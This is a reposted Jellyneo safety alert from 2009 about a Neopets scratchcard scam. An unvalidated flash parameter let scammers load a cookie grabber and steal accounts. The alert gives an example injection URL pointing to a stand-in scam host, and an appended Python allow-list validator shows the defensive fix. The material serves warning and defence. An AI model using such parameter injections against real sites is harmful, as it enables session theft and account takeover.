***SCAM ALERT*** Per JellyNeo.

This is taken from Jellyneo.net.

jnSafety Team Alert: Potential Scratchcard Cookie Grabber!
  • Posted by Dave
  • Posted on January 8, 2009, 8:42 pm NST

We have a brand new scam that is taking the Neoboards by storm! This one, I have to say, is pretty brilliant with respect to what is being exploited…
Basically, some scammers are changing their petpages to show a picture of the Pant Devil with a message saying something along the lines of “The Pant Devil has stolen this page! Click here to reclaim it!” The link goes to a Desert Scratchcard, waiting to be scratched by you. The only thing is, the scammers have potentially included some malicious coding in that URL, rendering them able to steal your Neopets account password and gain access to your account.

In short, DO NOT click on any links on petpages, shops, userlookups, guilds, or Neoboards that lead to a scratchcard. One, you should not be viewing them in that fashion, and two, your account may be stolen! Also be warned that not all links will necessarily include the Pant Devil set up mentioned above. Just be wary of clicking any “long links” for now. 😉

If You Clicked: If you clicked a scratchcard link, change your password immediately. You must change it right now. Also, apply a PIN Number to all areas where you have significant NP invested. Even if you didn’t click the link, this is a great precaution. You can only be affected by this scam if you click the scratchcard link… so don’t!

For the techies out there, The Neopets Team has failed to secure one of the GET variables that the flash scratchcards are using. So, the scammers are able to include their own malicious flash file as a “background image” in the scratchcard that doubles as a cookie grabber. Example:

images.neopets.com/flashfile.swf?background=http://scamsite.com/badcode.swf

Sheer genius, really. Neopets basically has to update their scratchcard coding to include some sort of validation to make sure any flash files being included are strictly from the images.neopets.com or swf.neopets.com servers. Hopefully this does not call for an extended downtime of scratchcards like last time!
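As an added example (not Jellyneo's or Neopets' code), this is the kind of server-side allow-list check the alert calls for, in Python: the `background` value is accepted only if it is an http(s) .swf URL on one of the two hosts the alert names. The function names and the fallback asset path are assumptions, and the look-alike URLs in the comments are constructed.

```python
from urllib.parse import urlsplit

# Hosts the alert says scratchcard assets should be restricted to.
ALLOWED_FLASH_HOSTS = frozenset({"images.neopets.com", "swf.neopets.com"})
# Assumed known-good fallback asset (placeholder path, not a real Neopets file).
DEFAULT_BACKGROUND = "https://images.neopets.com/placeholder_default_bg.swf"


def is_allowed_flash_url(url: str) -> bool:
    """Return True only for an http(s) .swf URL on an allow-listed host.

    The host is compared exactly rather than by prefix or suffix, so
    look-alike hosts (images.neopets.com.scamsite.com) and URLs carrying a
    userinfo field (http://images.neopets.com@scamsite.com/) are rejected,
    as are scheme-relative URLs and non-default ports.
    """
    if not isinstance(url, str) or len(url) > 2048:
        return False
    try:
        parts = urlsplit(url.strip())
        port = parts.port  # raises ValueError on a non-numeric port
    except ValueError:
        return False
    if parts.scheme not in ("http", "https"):
        return False
    if parts.username is not None or parts.password is not None:
        return False
    if (parts.hostname or "") not in ALLOWED_FLASH_HOSTS:
        return False
    if port is not None and port != (443 if parts.scheme == "https" else 80):
        return False
    path = parts.path.lower()
    # Only a .swf under the trusted host, with no path-traversal segments.
    return path.endswith(".swf") and ".." not in path.split("/")


def safe_background(param: str) -> str:
    """Resolve the untrusted `background` GET value to a URL that is safe to load."""
    return param if is_allowed_flash_url(param) else DEFAULT_BACKGROUND
```

Rejected values fall back to a known-good asset instead of being echoed into the page, so a crafted link renders the normal scratchcard rather than a foreign flash file.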
